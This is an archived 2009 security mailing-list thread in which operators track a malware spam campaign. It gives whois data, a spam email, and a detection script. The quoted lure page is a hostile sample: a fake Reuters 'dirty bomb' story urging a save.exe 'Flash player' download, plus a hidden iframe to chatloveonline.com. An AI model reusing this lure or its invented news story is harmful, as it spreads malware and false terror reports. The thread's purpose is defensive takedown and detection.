[nsp-sec] chatloveonline.com & breakinggoodnews.com & breakingfreemichigan.com

Keith Schoenefeld schoenk at illinois.edu
Tue Mar 17 09:40:31 EDT 2009



ACK 6200 (I notified my colleague) at UIC.

-- KS

William Allen Simpson wrote:
| ----------- nsp-security Confidential --------
|
| The good news is that Gmail is now flagging these messages as spam.
|
| The bad news is that the number of domains and servers is expanding.  A
| common element still seems to be the chatloveonline.com iframe, so I've
| swapped the subject line.  But that could easily change.
|
| Today's was yug.breakingfreemichigan.com, running with 6 nameservers at
| ns[1-6].yug.breakingfreemichigan.com.
|
| That's a little scarier, as they've managed to identify the victim's state
| of residence before the spam, and then geolocate the city from the IP
| used.
| Note that this is dynamic, correctly identifying Madison Heights yesterday,
| and Ann Arbor today.
|
| The whois for chatloveonline.com registration seems to be garbage data, yet
| recently updated.  All 3 so far are registered with ename.com.
|
| CHATLOVEONLINE.COM
|    Registrar: XIAMEN ENAME NETWORK TECHNOLOGY CORPORATION LIMITED DBA
| ENAME CORP
|    Whois Server: whois.ename.com
|    Referral URL: http://www.ename.com
|    Name Server: NS1.EXTENDEDMAN.COM
|    Name Server: NS2.EXTENDEDMAN.COM
|    Name Server: NS3.EXTENDEDMAN.COM
|    Name Server: NS4.EXTENDEDMAN.COM
|    Name Server: NS5.EXTENDEDMAN.COM
|    Name Server: NS6.EXTENDEDMAN.COM
|    Status: clientDeleteProhibited
|    Status: clientTransferProhibited
|    Updated Date: 09-mar-2009
|    Creation Date: 04-feb-2009
|    Expiration Date: 04-feb-2010
|
| Registrant Contact Information :
| YANSHIYING
| YANSHIYING
| yanshi_ying at yeah.net
| FUNANLU19, 200159
|
| Anybody able to get these (and any related) taken down?
|
| ===
|
| Presumably owned machines acting as servers this morning:
|
|
| ===
|
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
| <html>
| <head>
| <TITLE>Reuters-United States: Terror attack in Ann Arbor</TITLE>
| <META NAME="description" CONTENT="Reuters.com brings you the latest news
| from around the world, covering breaking news in business, finance,
| politics, entertainment, and more in video and pictures."></meta>
| </head>
| <body>
| <table width="413" align="center" border="0">
| <tr><td><img border="0" src="reu.gif"></td></tr>
| <tr><td><b>Powerful explosion burst in Ann Arbor this morning.</b><br>
| <br>
| At least 12 people have been killed and more than 40 wounded in a bomb
| blast near market in Ann Arbor.
| Authorities suggested that explosion was caused by "dirty" bomb. Police
| said the bomb was detonated from close by using electric cables.
| "It was awful" said the eyewitness about blast that he heard from his
| shop. "It made the floor shake. So many people were running"<br>
| Until now there has been no claim of responsibility.<br><br>
|
| <a href="save.exe"><img border="0" src="vid.gif" alt="You need the
| latest Flash player to view video content. Click here to
| download."></a><br>
| You need the latest Flash player to view video content. <a
| href="save.exe">Click here</a> to download.<br>
| <br>
| <br>
| Related Links:<br>
| <a href="http://en.wikipedia.org/wiki/Dirty_bomb">http://en.wikipedia.org/wiki/Dirty_bomb</a><br>
|
| <a href="http://www.google.com/search?q=Ann
| Arbor+terror+attack">http://www.google.com/search?q=Ann
| Arbor+terror+attack</a><br>
| </td></tr>
| </table>
| <iframe src="http://chatloveonline.com/tds/Sah7" width="1" height="1"
| style="visibility:hidden;position:absolute"></iframe>
|
| </body>
| </html>
|
| ===
|
| Return-Path: <>
| Received: from wergvan ([87.226.228.26])
|         by mx.google.com with SMTP id
| 18si10231257gxk.53.2009.03.16.22.01.47;
|         Mon, 16 Mar 2009 22:01:51 -0700 (PDT)
| Received-SPF: neutral (google.com: 87.226.228.26 is neither permitted
| nor denied by domain of wergvan) client-ip=87.226.228.26;
| Authentication-Results: mx.google.com; spf=neutral (google.com:
| 87.226.228.26 is neither permitted nor denied by domain of wergvan)
| smtp.mail=
| Received: from rpw ([237.49.168.72]) by wergvan with Microsoft
| SMTPSVC(6.0.3790.211); Tue, 17 Mar 2009 13:32:42 +0900
| Message-ID: <002801c9a6b9$698cde50$ed31a848 at BUHGALTERrpw>
| From: "Mag" <ruethema.livingston at sc.com>
| To: <william.allen.simpson at gmail.com>
| Subject: Are you in good health?
| Date: Tue, 17 Mar 2009 13:24:54 +0900
| MIME-Version: 1.0
| Content-Type: text/plain;
|     format=flowed;
|     charset="windows-1250";
|     reply-type=original
| Content-Transfer-Encoding: 7bit
| X-Priority: 3
| X-MSMail-Priority: Normal
| X-Mailer: Microsoft Outlook Express 6.00.2900.2180
| X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180
|
| I hope you are in good health http://yug.breakingfreemichigan.com/run.php
|
|
|
| _______________________________________________
| nsp-security mailing list
| nsp-security at puck.nether.net
| https://puck.nether.net/mailman/listinfo/nsp-security
|
| Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
| community. Confidentiality is essential for effective Internet security
| counter-measures.
| _______________________________________________


--
Keith Schoenefeld
Network Security Officer
Office of Privacy and Information Assurance
University of Illinois
(217) 333-4332


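An added example, not part of the thread above: a small scanner for lure pages with the shape quoted in the message (a hidden or 1x1 iframe plus a "Flash player" link that actually points at an executable). The sample HTML is constructed and modelled on the quoted page, with the iframe host replaced by a placeholder domain.

```python
"""Flag HTML lure pages that pair a hidden/tiny iframe with a link to an executable."""
from html.parser import HTMLParser
import re

# Extensions a browser would hand to the OS as a program rather than render.
EXECUTABLE_RE = re.compile(r"\.(exe|scr|com|pif|bat)(\?|#|$)", re.I)


class LureScanner(HTMLParser):
    """Collect suspicious iframes and executable download links while parsing."""

    def __init__(self):
        super().__init__()
        self.hidden_iframes = []  # src of iframes that are 0/1 px or CSS-hidden
        self.exe_links = []       # href of anchors pointing at executables

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "iframe":
            style = a.get("style", "").replace(" ", "").lower()
            tiny = a.get("width", "").strip() in ("0", "1") or \
                   a.get("height", "").strip() in ("0", "1")
            hidden = "visibility:hidden" in style or "display:none" in style
            if tiny or hidden:
                self.hidden_iframes.append(a.get("src", ""))
        elif tag == "a" and EXECUTABLE_RE.search(a.get("href", "")):
            self.exe_links.append(a["href"])


def scan_lure(html):
    """Return the indicators found and whether both halves of the lure are present."""
    p = LureScanner()
    p.feed(html)
    p.close()
    return {
        "hidden_iframes": p.hidden_iframes,
        "exe_links": sorted(set(p.exe_links)),
        "suspicious": bool(p.hidden_iframes) and bool(p.exe_links),
    }


# Constructed sample modelled on the quoted page; tds.example.invalid is a placeholder.
SAMPLE = """<html><head><TITLE>Reuters-United States: Terror attack in Ann Arbor</TITLE></head>
<body><table width="413"><tr><td>
<a href="save.exe"><img border="0" src="vid.gif" alt="You need the
latest Flash player to view video content."></a><br>
You need the latest Flash player. <a href="save.exe">Click here</a> to download.<br>
</td></tr></table>
<iframe src="http://tds.example.invalid/Sah7" width="1" height="1"
style="visibility:hidden;position:absolute"></iframe>
</body></html>"""

if __name__ == "__main__":
    print(scan_lure(SAMPLE))
```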
